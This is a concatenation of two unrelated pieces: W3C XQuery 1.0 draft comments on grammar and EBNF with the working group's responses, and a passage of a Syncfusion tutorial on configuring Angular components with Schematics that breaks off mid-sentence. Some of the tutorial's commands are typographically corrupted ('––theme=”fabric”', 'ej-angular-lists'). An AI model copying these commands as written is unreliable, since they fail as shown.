think she should make a more specific suggestion for material to be added at one or more later points in the document. XQuery: editorial, minor Section 2.4.2 bullet 4 a says: "If an element has type annotation xdt:untypedAtomic...." Our data model doesn't seem to allow this case. XQuery: editorial, minor. The XQuery specification in particular uses Qname in places where an expanded Qname is technically the right terminology. Dana requests some instances of "QName" be changed to "expanded QName". Status: Accepted and implemented. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: xml-version "The general rules for [XML 1.1] vs. [XML 1.0], as described in the A.2 Lexical structure section, should be applied to this production." The phrase "general rules" is vague, and doesn't connect well with A.2, which doesn't present rules in its discussion of XML versions. Also, "should be applied to this production" is vague. How about: An implementation's choice to support the XML 1.0 or 1.1 character set determines the external document from which to obtain the definition for this production. But where are the (external) definitions of NCName and QName for XML 1.1 documents? Also, XML 1.0 and 1.1 have the same definition for S, so the gn: xml-version annotation doesn't apply to [11] S. -Michael Dyck XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: leading-lone-slash "Therefore, a stand-alone slash, in a leading position, that is followed by an operator, will need to be parenthesized in order to stand alone, as in "(/) * 5". "5 * /", on the other hand, is fine." What is a "leading position"? What is an "operator"? If "5 * /" is fine, is "5 * / * 5" fine? This sentence is more than just a helpful note, it actually restricts the language. It should probably be given a different status. -Michael Dyck > Proposed, recommended, or existing response: > Clean up and request approval Accepted, let's make this a normative part of the spec. Scott will take care. Scott's proposal accepted, as amended by correcting inversion of RHS with LHS. Scott's proposal accepted, as amended by correcting inversion of RHS with LHS. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: lt "Token disambiguation of the overloaded '<' pattern" Why do you call "<" an "overloaded" pattern? Is it the fact that it occurs in more than one place in the grammar? There are about 24 such patterns. So why single out "<"? Moreover, the leading-lone-slash restriction ensures that there is no ambiguity around the "<" pattern, so there is no (further) disambiguation to do. "The "<" comparison operator can not occur in the same places as a "<" tag open pattern. The "<" comparison operator can only occur in the OPERATOR state and the "<" tag open pattern can only occur in the DEFAULT and the ELEMENT_CONTENT states." Note that even if they *could* occur in the same state, it wouldn't matter, because the A.2.2 machine doesn't distinguish the two cases; it simply reports an instance of the "<" pattern. -Michael Dyck No action. Scott will reply. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1.1 Grammar Notes grammar-note: parens "A look-ahead of one character is required to distinguish function patterns from a QName followed by a comment." Change "comment" to "comment, pragma, or extension". "For example: address (: this may be empty :) may be mistaken for a call to a function named "address" unless this lookahead is employed." It sounds like this lookahead would have to be incorporated into the operation of the A.2.2 machine. If so, that's another way in which A.2.2 is under-defined (see). -Michael Dyck Proposal accepted. It is unclear how the various reference sections have been made up (except for the 'normative reference' section). I suggest to just have 'normative references' and 'non-normative refences'. Regards, Martin. Status: Accepted and on my work list. The xhtml example in 4.6 should use the schema location at W3C, not some arbitrary example location. Regards, Martin. Done by using a different example of an imported schema. The following two text fragments from 4.1 don't really match up: "The version number "1.0" indicates the requirement that the query must be processed by an XQuery Version 1.0 processor." "An XQuery implementation must raise a static error [err:XQ0031] when processing a query labeled with a version that the implementation does not support." If an XQuery 2.0 processor is defined to support both XQuery 1.0 and 2.0, this won't make sense. Regards, Martin. 3.7.4, last paragraph: How can an XQuery programmer make sure that a namespace declaration is included so that the xs namespace prefix in the example is declared in the output? There has to be a clear way to do that. Regards, Martin. in A.4, precedence order, in item 2, please streamline, i.e. "for, some, every, if, or". Also, please add () at the bottom, and please change "(comma)" to ", (comma)" or so. Regards, Martin. Proposal accepted. in A.2.1, "words" isn't clearly defined. Regards, Martin. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1 EBNF It would be good if some groups of related symbols were named more consistently. Specifically... -------- 'content characters': ElementContentChar (no change) QuotAttrContentChar (no change) AposAttrContentChar (no change) ExprCommentContentChar instead of ExprCommentContent PragmaContentChar instead of PragmaContents ExtensionContentChar instead of ExtensionContents (Mind you, I've elsewhere suggested renaming ExprComment as just Comment, so that would give you CommentContentChar.) -------- computed constructors: CompDocConstructor (no change) CompElemConstructor (no change) CompNSConstructor (no change) CompAttrConstructor (no change) CompTextConstructor (no change) CompCommentConstructor instead of CompXmlComment CompPIConstructor instead of CompXmlPI -------- direct constructors: DirElemConstructor (no change) DirAttributeList instead of AttributeList DirAttributeValue instead of AttributeValue DirElemContent instead of ElementContent DirCommentConstructor instead of XmlComment DirPIConstructor instead of XmlPI DirCdataSectionConstructor instead of CDataSection or else: XmlElement instead of DirElemConstructor XmlAttributeList instead of AttributeList XmlAttributeValue instead of AttributeValue XmlElementContent instead of ElementContent XmlComment (no change) XmlPI (no change) XmlCdataSection instead of CDataSection -Michael Dyck Seems like goodness to me, worth the trouble? Accepted, apart from the DirCdataSectionConstructor instead of CDataSection (which has gone anyway). Scott will tackle this. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 3.7 Constructors, A.1 EBNF I think it would be an improvement if you changed [80] Constructor ::= DirElemConstructor | ComputedConstructor | XmlComment | XmlPI | CDataSection to [80] Constructor ::= DirectConstructor | ComputedConstructor [new] DirectConstructor ::= DirElemConstructor | XmlComment | XmlPI | CDataSection This would better reflect the division between computed and direct constructors. Incidentally, it would also mean that you could change: [109] ElementContent ::= ElementContentChar | "{{" | "}}" | DirElemConstructor | EnclosedExpr | CDataSection | CharRef | PredefinedEntityRef | XmlComment | XmlPI to just: [109] ElementContent ::= DirectConstructor | ElementContentChar | "{{" | "}}" | CharRef | PredefinedEntityRef | EnclosedExpr ------------------------------------------------------------------------ Moreover, if you introduced [new] CommonContent ::= PredefinedEntityRef | CharRef | "{{" | "}}" | EnclosedExpr then you could eliminate a bunch of repetition in [109,112,113]: [109] ElementContent ::= DirectConstructor | ElementContentChar | CommonContent [112] QuotAttrValueContent ::= QuotAttrContentChar | CommonContent [113] AposAttrValueContent ::= AposAttrContentChar | CommonContent -Michael Dyck Seems like goodness to me, worth the trouble? Accepted. Scott and Don will tackle this. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.1 EBNF It would be more helpful to the reader if you presented the productions in an order such that: (1) The definition for a symbol is close to (and after) its uses (except for ubiquitous symbols like ExprSingle and TypeDeclaration). (2) Definitions for related symbols are close. Of course, there are tradeoffs involved, but here is an ordering that I believe fulfills these two desiderata better than the current ordering: ------------------------------------ [30] Module [36] VersionDecl [31] MainModule [32] LibraryModule [33] ModuleDecl [34] Prolog [35] Separator [118] NamespaceDecl [115] XMLSpaceDecl [119] DefaultNamespaceDecl [116] DefaultCollationDecl [117] BaseURIDecl [146] SchemaImport [147] SchemaPrefix [37] ModuleImport [38] VarDecl [145] ValidationDecl [120] FunctionDecl [121] ParamList [122] Param [114] EnclosedExpr [39] QueryBody [40] Expr [41] ExprSingle [42] FLWORExpr [43] ForClause [44] PositionalVar [45] LetClause [46] WhereClause [47] OrderByClause [48] OrderSpecList [49] OrderSpec [50] OrderModifier [51] QuantifiedExpr [52] TypeswitchExpr [53] CaseClause [54] IfExpr [55] OrExpr [56] AndExpr [57] InstanceofExpr [58] TreatExpr [59] CastableExpr [60] CastExpr [61] ComparisonExpr [82] GeneralComp [83] ValueComp [84] NodeComp [62] RangeExpr [63] AdditiveExpr [64] MultiplicativeExpr [65] UnaryExpr [66] UnionExpr [67] IntersectExceptExpr [68] ValueExpr [78] ValidateExpr [69] PathExpr [70] RelativePathExpr [71] StepExpr [72] AxisStep [85] ForwardStep [89] ForwardAxis [87] AbbrevForwardStep [86] ReverseStep [90] ReverseAxis [88] AbbrevReverseStep [91] NodeTest [92] NameTest [93] Wildcard [73] FilterStep [77] Predicates [75] PrimaryExpr [94] Literal [95] NumericLiteral [76] VarRef [96] ParenthesizedExpr [74] ContextItemExpr [97] FunctionCall [80] Constructor [81] ComputedConstructor [99] CompDocConstructor [100] CompElemConstructor [101] CompNSConstructor [102] CompAttrConstructor [105] CompTextConstructor [104] CompXmlComment [103] CompXmlPI [98] DirElemConstructor [110] AttributeList [111] AttributeValue [112] QuotAttrValueContent [113] AposAttrValueContent [109] ElementContent [108] XmlComment [107] XmlPI [106] CDataSection [124] SingleType [123] TypeDeclaration [125] SequenceType [144] OccurrenceIndicator [127] ItemType [126] AtomicType [128] KindTest [141] AnyKindTest [138] DocumentTest [140] TextTest [139] CommentTest [137] PITest [130] AttributeTest [129] ElementTest [135] AttribNameOrWildcard [134] ElementNameOrWildcard [136] TypeNameOrWildcard [132] AttributeName [131] ElementName [133] TypeName [79] SchemaContext [143] SchemaContextLoc [142] SchemaContextPath ------------------------------------ [18] PITarget [20] VarName [12] SchemaMode [13] SchemaGlobalTypeName [14] SchemaGlobalContext [15] SchemaContextStep [7] IntegerLiteral [8] DecimalLiteral [9] DoubleLiteral [16] Digits [10] StringLiteral [22] PredefinedEntityRef [24] CharRef [23] HexDigits [17] EscapeQuot [25] EscapeApos [27] ElementContentChar [28] QuotAttrContentChar [29] AposAttrContentChar [3] ExprComment [4] ExprCommentContent [1] Pragma [5] PragmaContents [2] MUExtension [6] ExtensionContents [21] QName [19] NCName [11] S [26] Char ------------------------------------ -Michael Dyck Don't think it's quite worth the trouble, begs the issue of whether tokens should be separated out or not. But I'm willing. Accepted. Scott will tackle this. Dear Colleagues, This comment pertains to the Nov. 12 2003 version of XPath 2.0 [1]. [1] Lisa Martin, on behalf of the XML Schema Working Group ---------------------------------------------------- Section 2.4.4 Sequence Type Matching In the definition of type-matches in 2.4.4, known and unknown derived types are treated differently with respect to derivation by extension and restriction. Implementations are free to return true if they can determine that unknown types are derived by restriction but not if they are derived by extension or a mix of extension and restriction steps, whereas known types will return true if derived by any means. If this non-parallelism is intentional, an explanatory note might help avoid confusion on the part of readers. If it is not intentional, it should be fixed. In addition, the rules are careful to say "derived by one or more steps of restriction or extension" but say simply "derived by restriction". Is it intended that this be confined to a single derivation step? Or would one or more restriction steps be OK? This comment is about the definition of the "type-matches" pseudo-function, which has been replaced by a new pseudo-function named "derives-from" with a new definition. I believe that the new definition addresses the issue raised by this comment. I consider this comment to be "overtaken by events." XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here is a comment from that did not receive a response from the WG. ------ A.4 Precedence Order "In the cases where a number of operators are a choice at the same production level, the expressions are always evaluated from left to right." The phrase "a choice at the same production level" is vague. And the order in which the *expressions* are evaluated is immaterial. For example, in the AdditiveExpr A - B - C, the order in which you evaluate A, B, and C doesn't matter (except in the presence of dynamic errors); what matters (when you're defining precedence) is the order in which you evaluate the subtractions. Here's something that addresses these points, and comes closer to using standard terminology: When a production directly derives a sequence of expressions separated by binary operators, the operators are evaluated from left to right. In any event, an example might help. -Michael Dyck Scott's proposal goes too far. Among operators at the same precedence level, operators must be applied from left to right (otherwise minus becomes nondeterministic). Amended proposal is accepted. Scott's original proposal goes too far. Among operators at the same precedence level, operators must be applied from left to right (otherwise minus becomes nondeterministic). Amended proposal is accepted. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here is a comment from that did not receive a response from the WG. ------ A.1 EBNF [17] EscapeQuote ::= '"' '"' For the right-hand side, why not just '""'? (Note that EscapeApos is "''".) -Michael Dyck Closed as duplicate of 2004Feb0411. Duplicate of 2004Feb0411 XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here are some comments from that did not receive a response from the WG. It turns out that, in my recent submission: I already re-stated many of the unanswered comments from the Nov 2002 posting. These two are the remainder. ------ A.2.1 White Space Rules "white space is needed to disambiguate the token" In my recent posting, I suggested changing "token" to "grammar". But I think I prefer what I said in Nov 2002: The phrase "disambiguate the token" is, I believe, a misuse of the concept of ambiguity. At any rate, I think it would be plainer and more accurate to say that whitespace is needed to prevent two adjacent tokens from being (mis-)recognized as one. For instance, consider the character-sequence a- b Note that there is a space before the 'b'. It thus has only one derivation from Module (the "a minus b" one), so there is no ambiguity involved, no disambiguation needed. Nevertheless, it is still a case in which (I assume) whitespace is needed between 'a' and '-' to prevent the longest-match rule from (mis-)recognizing 'a-' as a QName. "Special whitespace notation" Note that only the *notation* is special. The treatment of whitespace characters in "ws: explicit" and "ws: significant" productions is *not* special: they treat them like any other character, just as the XML spec does. It's the *unmarked* productions that have special interpretation with respect to whitespace. -Michael Dyck Proposal accepted. XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 Here are some comments from that did not receive a response from the WG. ------ A.1 EBNF "The following grammar uses the same Basic Extended Backus-Naur Form (EBNF) notation as [XML 1.0], except that grammar symbols always have initial capital letters." I still wonder what the reason for this exception is. And that isn't the only difference from the notation used in XML. In fact, you immediately discuss two others -- the <> terminal groupings, and the /**/ production comments. Another is the use (in prodns [11,19,21,26]) of references to symbols in other specifications. Maybe you could just change "except that" to something like "with the following minor differences". Also (this isn't actually a leftover comment, but while I'm here): there's no reason to capitalize the word "Basic". The XML spec itself uses the word "simple". (These comments also apply to a similar sentence in 1 Introduction.) ----- A.2 Lexical structure "The rules for calculating these states are given in the A.2.2 Lexical Rules section." No, A.2.2 does not give rules for calculating the states. -Michael Dyck Adapt "Symbols are written with an initial capital letter if they are the start symbol of a regular language, otherwise with an initial lower case letter."? Also, be more specific about differences with EBNF in XML? Worth the work? On the A.1 EBNF part: ok, accepted, Scott will take this action up. Don: also note in the intro of the lang book "Grammar symbols have initial caps" etc, should I delete this? Scott: yes.
http://www.w3.org/2005/04/xquery-issues.html
CC-MAIN-2021-39
en
refinedweb
When the demand on a server increases and decreases, it is desirable to change the resources dedicated to the server. The options available range from the use of manual threads to allow concurrent behavior to those embedded in specialized classes to handle thread pools and NIO channels. In this section, we will use threads to augment our simple echo server. The definition of the ThreadedEchoServer class is as follows. It implements the Runnable interface to create a new thread for each connection. The private Socket variable will hold the client socket for a specific thread: public class ThreadedEchoServer implements Runnable { private static Socket clientSocket; public ThreadedEchoServer(Socket clientSocket) ... No credit card required
https://www.oreilly.com/library/view/learning-network-programming/9781785885471/ch01s06.html
CC-MAIN-2019-26
en
refinedweb
Line Plots using Matplotlib - Mar 4 • 3 min read - Key Terms: line plot, datetime Import Modules import matplotlib.pyplot as plt from datetime import datetime % matplotlib inline Generate a Simple Line Plot We call the plot method and must pass in at least two arguments, the first our list of x-coordinates, and the second our list of y-coordinates. plt.plot([1, 2, 3, 4], [1, 2, 3, 4]); We plotted 4 points with a line connected through them. Generate a Line Plot from My Fitbit Activity Data More often, you'll be asked to generate a line plot to show a trend over time. Below is my Fitbit activity of steps for each day over a 15 day time period. dates = ['2018-02-01', '2018-02-02', '2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06', '2018-02-07', '2018-02-08', '2018-02-09', '2018-02-10', '2018-02-11', '2018-02-12', '2018-02-13', '2018-02-14', '2018-02-15'] steps = [11178, 9769, 11033, 9757, 10045, 9987, 11067, 11326, 9976, 11359, 10428, 10296, 9377, 10705, 9426] Convert Strings to Datetime Objects In our plot, we want dates on the x-axis and steps on the y-axis. However, Matplotlib does not allow for strings - the data type in our dates list - to appear as plots. We must convert the dates as strings into datetime objects. Code Explanation We'll first assign the variable dates_list to an empty list. We'll append our newly created datetime objects to this list. We'll iterate over all elements in our original dates list of string values. For each item in our list, we'll access the strptime method in our datetime module and pass in two arguments. The first argument is our date - an item in our list. The second argument is the datetime format. Notice how our dates originally provided are in the format year-month-day with zero-padded month and day values. This means the 2nd of the month is 02 rather than just 2. Therefore, we must tell this strptime method this format with Y for year, m for month and d for day. dates_list = [] for date in dates: dates_list.append(datetime.strptime(date, '%Y-%m-%d')) We can preview the syntax of our first datetime object. dates_list[0] datetime.datetime(2018, 2, 1, 0, 0) Our elements are of type datetime from the datetime module. Therefore, the type is datetime.datetime. type(dates_list[0]) datetime.datetime Plot Line Plot of New Data plt.figure(figsize=(10, 8)) plt.plot(dates_list, steps); In order to see more of the variation in steps per day, by default, Matplotlib labels the smallest x-tick at 9500 instead of simply 0. I also called the figure method and passed in a larger than normal figure size so we could easily see the y-tick values.
https://dfrieds.com/data-visualizations/line-plots-python-matplotlib
CC-MAIN-2019-26
en
refinedweb
From: Toon Knapen (toon.knapen_at_[hidden]) Date: 2004-08-16 04:17:57 I added an extension module 'f.jam' to be able to compile fortran sources with bjam version 2. Now I also tried to add requirements for include files but I did not find a way to make it work. What I did in my f.jam is: import toolset : flags ; flags f.compile INCLUDES <include> ; and than use the $(INCLUDES) variable on the command-line where the fortran compiler is invoked. But the INCLUDES variable remains empty. Any ideas how I can solve this? (my project is in attachment) --------------010901080909080104070303 Content-Type: application/zip; name="fortranproject.zip" Content-Transfer-Encoding: base64 Content-Disposition: inline; filename="fortranproject.zip" [Attachment content not displayed.] --------------010901080909080104070303-- Boost-Build list run by bdawes at acm.org, david.abrahams at rcn.com, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
https://lists.boost.org/boost-build/2004/08/6987.php
CC-MAIN-2019-26
en
refinedweb
___________________________Page 2 Submitted By:Name - Ved Prakash Singh Roll No. - 08100EN034 Class - B.Tech.,Part-3, CSE. IT_BHU, Varanasi. OpenGl as) and is widely used in CAD, virtual reality, scientific visualization, information visualization, and flight simulation. It is also used in video games, where it competes with Direct3D on Microsoft Windows platforms (see OpenGL vs. Direct3D). OpenGL is managed by a non-profit technology consortium, the Khronos Group. 4.1 at a glance :OpenGL 4.1 improves OpenCL interoperability for accelerating computationally intensive visual applications and continues support for both the Core and Compatibility profiles first introduced with OpenGL 3.2, enabling developers to use a streamlined API or retain backwards compatibility for existing OpenGL code, depending on their market needs. Full compatibility with OpenGL ES 2.0 APIs for easier porting between mobile and desktop platforms. OpenGL 4.1 Core Profile Specification OpenGL 4.1 Compatibility Profile Specification OpenGL Shading Language 4.10.6 Specification OpenGL Registry The. If we want to add an extension specification to the Registry, correct an existing specification, request allocation of enumerants and other controlled resources in the OpenGL / GLX / WGL namespaces, or otherwise change the Registry, please create a Bugzilla account on the public Khronos.org Bugzilla, and submit your request there against Product "OpenGL", Component "Registry". You can use this Bugzilla link, which fills in many fields for us. The Registry includes databases defining the APIs and reserved enumerant ranges for OpenGL, GLX, and WGL. There are several of these ".spec" files for each API, described below : OpenGL .spec files o enum.spec - canonical description of the reserved OpenGL enumerants and the ranges allocated for different purposes. New allocations are made here and when extensions using values in allocated ranges are registered, the enumerants in those extensions are added as well. o enumext.spec - derived variant of enum.spec containing the enumerant values grouped by the extension or API core revision they correspond to. o gl.spec - canonical description of the functions defined by core OpenGL and extensions. When extensions are registered, the functions they define are added here. o gl.tm - typemap used to convert the abstract typenames in gl.spec into underlying GL types. o enumext.spec, gl.spec, and gl.tm are used to generate glext.h GLX .spec files o glxenum.spec - canonical description of the reserved GLX enumerants, like enum.spec. o glxenumext.spec - derived variant of glxenum.spec containing the enumerant values grouped by the GLX extension or API core revision they correspond to. This only includes GLX core versions 1.3 and later. o glx.spec - canonical description of the functions defined by core GLX up to version 1.3. o glxext.spec - canonical description of the functions defined by GLX extensions and core versions 1.3 and later. o glx.tm - typemap used to convert the abstract typenames in glx*.spec into underlying GLX types. o glxenumext.spec, glxext.spec, and glx.tm are used to generate glxext.h. WGL .spec files o wglenum.spec - canonical description of the reserved WGL enumerants, like enum.spec. o wglenumext.spec - derived variant of wglenum.spec containing the enumerant values grouped by the WGL extension they correspond to. This only includes WGL core versions 1.3 and later (Microsoft has never revised the WGL core API). o wgl.spec - canonical description of the functions defined by WGL. o wglext.spec - canonical description of the functions defined by WGL extensions. o wgl.tm - typemap used to convert the abstract typenames in wgl*.spec into underlying WGL and Win32 types. o wglenumext.spec, wglext.spec, and wgl.tm are used to generate wglext.h. Example:This example will draw a green square on the screen. OpenGL has several ways to accomplish this task, but this is the easiest to understand. However, the reader should be aware that most of the APIs used in the code below have been deprecated in and after the OpenGL 3.0 specification. camera-relative defines a transform from model-relative coordinates to camera The combination of the modelview matrix and the projection transforms objects from model-relative space to projection space. */ matrix space. matrix screen GLX X11 (including network transparency) WGL Microsoft Windows CGL Mac OS X. Better integration with Mac OS X's application frameworks is provided by APIs layered on top of CGL: AGL for Carbon and NSOpenGL for Cocoa. Additionally, GLUT, SDL and the GLFW libraries provide functionality for basic windowing using OpenGL, in a portable manner.Some open source cross-platform toolkits, such as GTK+, Qt and WxWidgets, include widgets to embed OpenGL contents. ______________________________________ 8
https://de.scribd.com/document/94008221/An-Introduction-to-OpenGL
CC-MAIN-2019-26
en
refinedweb
main()FunctionAttributes: FunctionAttribute FunctionAttribute FunctionAttributes FunctionAttribute: nothrow pure Property MemberFunctionAttributes: MemberFunctionAttribute MemberFunctionAttribute MemberFunctionAttributes MemberFunctionAttribute: const immutable inout return shared FunctionAttribute The in and out blocks or expressions of a function declaration specify the pre- and post-conditions of the function. They are used in Contract Programming. The code inside these blocks should not have any side-effects, including modifying function parameters and/or return values. Function return values are considered to be rvalues. This means they cannot be passed by reference to other functions. control mutations, D has the immutable type qualifier. If all of a pure function's parameters are immutable or copied values without any indirections, it can guarantee that the pure function has no side effects. can only throw exceptions derived from class Error. Nothrow functions are covariant with throwing ones. Ref functions allow functions to return by reference. This is analogous to ref function parameters. ref int foo() { auto p = new int; return *p; } ... foo() = 3; // reference returns can be lvalues); } WARNING: The definition and usefulness of property functions is being reviewed, and the implementation is currently incomplete. Using property functions is not recommended until the definition is more certain and implementation more mature. Properties are functions that can be syntactically treated as if they were fields or variables. Properties can be read from or written to. A property is read by calling a method or function with no arguments; a property is written by calling a method or function with its argument being the value it is set to. Simple getter and setter properties can be written using UFCS. These can be enhanced with the additon of the @property attribute to the function, which adds the following behaviors: @propertyfunctions cannot be overloaded with non- @propertyfunctions with the same name. @propertyfunctions can only have zero, one or two parameters. @propertyfunctions cannot have variadic parameters. typeof(exp)where expis an @propertyfunction, the type is the return type of the function, rather than the type of the function. __traits(compiles, exp)where expis an @propertyfunction, a further check is made to see if the function can be called. @propertyare mangled differently, meaning that @propertymust be consistently used across different compilation units. @propertysetter functions as special and modifies them accordingly. A simple property would be: struct Foo { @property int data() { return m_data; } // read property , have their address taken, etc.. This results in fewer bugs caused by not declaring a function virtual and then overriding it anyway. Member functions which are private or package are never virtual, and hence cannot be { override int def() { ... } // ok, overrides A.def override { // overrides and is covariant with Foo.test() override B test() { return null; } } Virtual functions all have a hidden parameter called the this reference, which refers to the class object for which the function is called.(); } A function foo = A. } The compiler makes the decision whether to inline a function or not. This decision may be controlled by pragma(inline), assuming that the compiler implements it, which is not mandatory. Note that any FunctionLiteral should be inlined when used in its declaration scope. Functions are overloaded based on how well the arguments to a function can match up with the parameters. The function with the best match is selected. The levels of matching are:. This is because the name mangling might not take the parameter types into account.: import A; import B; void bar(C c) { foo(); // calls A.foo() foo(1L); // calls A.foo(long) foo(c); // calls B.foo(C) foo(1,2); // error, does not match any foo foo(1); // error, matches A.foo(long) and B.foo(int) A.foo(1); // calls A.foo(long) } Even though B.foo(int) is a better match than A.foo(long) for foo(1), it is an error because the two matches are in different overload sets. Overload sets can be merged with an alias declaration: import A; import B; alias) } Parameter storage classes are in, out, ref, lazy, const, immutable, shared, inout or scope. For example: int foo(in int x, out int y, ref int z, int q); x is in, y is out, z is ref, and q is none. void foo(out int x) { // x is set to int.init, // which. An argument to a lazy parameter is not evaluated before the function is called. The argument is only evaluated if/when the parameter is evaluated within the function. Hence, a lazy argument can be executed 0 or more times. void dotimes(int n, lazy void exp) { while (n--) exp(); } void test() { int x; dotimes(3, writeln(x++)); } prints to the console: 0 1 2 A lazy parameter cannot be an lvalue. A lazy parameter of type void can accept an argument of any type. See Also: Lazy Variadic Functions Function parameter declarations can have default values: void foo(int x, int y = 3) { ... } ... foo(4); // same as foo(4, 3); Default parameters are evaluated in the context of the function declaration. If the default value for a parameter is given, all following parameters must also have default values. } Ref methods marked with the return attribute ensure the returned reference will not outlive the respective aggregate instance. struct S { private int x; ref int get() return { return x; } } ref int escape() { S s; return s.get(); // Error: escaping reference to local variable s } Template functions and lambdas can deduce the return attribute. inout ref parameters imply the return attribute. Functions taking a variable number of arguments are called variadic functions. A variadic function can take one of three forms:); }which prints: 0x00870FE0 5 arguments int 2 long 3 double 4.5 Foo 0x00870FE0 Bar 0x00870FD0 D-style variadic functions cannot be marked as @safe. Typesafe variadic functions are used when the variable argument portion of the arguments are used to construct an array or class object. For arrays: int hides another local variable in the same function: void func(int x) { int x; // error, hides previous definition of x double y; ... { char y; // error, hides previous definition of y int z; } { wchar z; // legal, previous z is out of scope } } While this might look unreasonable, in practice whenever this is done it either is a bug or at least looks like a bug. It is an error to return the address of or a reference to a local variable. It is an error to have a local variable and a label with the same name.); } Future directions: Function pointers and delegates may merge into a common syntax and be interchangeable with each other. See FunctionLiter(string[] args) { ... } int main() { ... } int main(string[] args) { ... }. Functions which are both portable and free of global side-effects can be executed at compile time. In certain contexts, such compile time execution is guaranteed. It is called Compile Time Function Execution (CTFE) then. The contexts that trigger CTFE are: static if static foreach static assert mixinstatement pragmaargument enum eval(Args...) = Args[0]; int square(int i) { return i * i; } void foo() { static j = square(3); // CTFE writeln(j); assert(square(4)); // run time writeln(eval!(square(5))); // CTFE } CTFE is subject to the following restrictions: int[]to float[]), including casts which depend on endianness, are not permitted. Casts between signed and unsigned types are permitted Pointers are permitted in CTFE, provided they are used safely: <, < =, >, >=) between two pointers is permitted when both pointers point to the same array, or when at least one pointer is null. & can give different results from run time in the following scenarios: These are the same kinds of scenarios where different optimization settings affect the results. Any functions that execute in CTFE foocannot be generated. A function template would be the appropriate method to implement this sort of thing. No-GC functions are functions marked with the @nogc attribute. Those functions do not allocate memory on the GC heap, through the following language features: .lengthproperty RangeErrorif the specified key is not present) . } To ease debugging, in a ConditionalStatement controlled by a DebugCondition @nogc functions can call functions that are not @nogc. Safe functions are functions that are statically checked to exhibit no possibility of undefined behavior. Undefined behavior is often used as a vector for malicious attacks. Safe functions are marked with the @safe attribute. The following operations are not allowed in safe functions: void*. class Exception. __gsharedvariables. are marked with the @trusted attribute. Trusted functions are guaranteed by the programmer to not exhibit any undefined behavior if called by a safe function. Generally, trusted functions should be kept small so that they are easier to manually verify. Trusted functions may call safe, trusted, or system functions. Trusted functions are covariant with safe or[]) } } © 1999–2018 The D Language Foundation Licensed under the Boost License 1.0.
https://docs.w3cub.com/d/function/
CC-MAIN-2019-26
en
refinedweb
Search an element in an unsorted array using minimum number of comparisons Given an array of n distinct integers and an element x. Search the element x in the array using minimum number of comparisons. Any sort of comparison will contribute 1 to the count of comparisons. For example, the condition used to terminate a loop, will also contribute 1 to the count of comparisons each time it gets executed. Expressions like while (n) {n–;} also contribute to the count of comparisons as value of n is being compared internally so as to decide whether or not to terminate the loop. Examples: Input : arr[] = {4, 6, 1, 5, 8}, x = 1 Output : Found Input : arr[] = {10, 3, 12, 7, 2, 11, 9}, x = 15 Output : Not Found Asked in Adobe Interview Below simple method to search requires 2n + 1 comparisons in worst case. for (i = 0; i < n; i++) // Worst case n+1 if (arr[i] == x) // Worst case n return i; How to reduce number of comparisons? The idea is to copy x (element to be searched) to last location so that one last comparison when x is not present in arr[] is saved. Algorithm: search(arr, n, x) if arr[n-1] == x // 1 comparison return "true" backup = arr[n-1] arr[n-1] = x for i=0, i++ // no termination condition if arr[i] == x // execute at most n times // that is at-most n comparisons arr[n-1] = backup return (i < n-1) // 1 comparison C/C++ Java Python3 C# PHP Output: Found Time Complexity: O(n) Number of Comparisons: Atmost (n+2) comparisons - Second minimum element using minimum comparisons - Number of comparisons in each direction for m queries in linear search - Search, insert and delete in an unsorted array - Front and Back Search in unsorted array - k-th missing element in an unsorted array - K'th Smallest/Largest Element in Unsorted Array | Set 1 - Cumulative frequency of count of each element in an unsorted array - Minimum and Maximum element of an array which is divisible by a given number k - Find start and ending index of an element in an unsorted array - Minimum number of given operations required to reduce the array to 0 element - K'th Smallest/Largest Element in Unsorted Array | Set 2 (Expected Linear Time) - K'th Smallest/Largest Element in Unsorted Array | Set 2 (Expected Linear Time) - Remove minimum number of elements such that no common element exist in both array - K'th Smallest/Largest Element in Unsorted Array | Set 3 (Worst Case Linear Time)
https://www.geeksforgeeks.org/search-element-unsorted-array-using-minimum-number-comparisons/
CC-MAIN-2019-26
en
refinedweb
Traditionally, we need to do the following to include any of the Syncfusion Angular components in the Angular CLI environment: - Create a new Angular CLI application. - Install the Syncfusion Angular package. - Register the module in app.module.ts. - Add required theme references. - Add the Syncfusion Angular component. - Compile and run the application using the ng serve -o command. In the manual configuration process, we may encounter many issues while working with multiple packages. Because of this, we recommend Angular Schematics for configuring any Syncfusion Angular components with simple commands. Schematics is a modern web scaffolding tool that can apply transforms to your project, such as creating new components, and installing and configuring existing Angular libraries. I am very excited to announce that our Angular UI component suite supports Schematics out of the box! This provides the following: - Add, install, and configure any Syncfusion Angular package. - Include our readily available themes in your application. - Include the most frequently used code snippets of our components. In this blog, we are going to learn about how to use our Angular Schematics features in an Angular CLI application. Let’s start with the integration and configuration. Create Angular CLI application Before we get started with configuration, ensure the latest Angular CLI is installed in your system environment. If it is not installed, we recommend you use the following command to install it: npm install -g @angular/cli Run the following command to create a new Angular CLI application: ng new syncfusion-schematics This command requires routing and style sheet format inputs to create the application, which are up to us. In the following figure, we are enabling the routing and using CSS for style sheet format. Creating an Angular CLI application Configure Syncfusion Angular packages The Angular CLI application is now ready. Navigate to the created CLI application using the following command: cd syncfusion-schematics Now you can install and configure any Syncfusion Angular package using the ng add command. Here, we are going to configure our ListView component using the following command: ng add @syncfusion/ej2-angular-lists This command will configure the ListView component with a default Material theme in the Angular CLI application. If you wish to change the built-in theme, include the theme attribute with the ng add command, as shown in the following code:. ng add @syncfusion/ej-angular-lists ––theme=”fabric” You can see the code changes required for changing the theme in the following screenshots from the Visual Studio Code editor. Note: You may use our Angular packages with multiple modules. For example, our @syncfusion/ej2-angular-popups components have multiple modules such as Dialog and Tooltip. We can include the specific module using the ––module attribute as 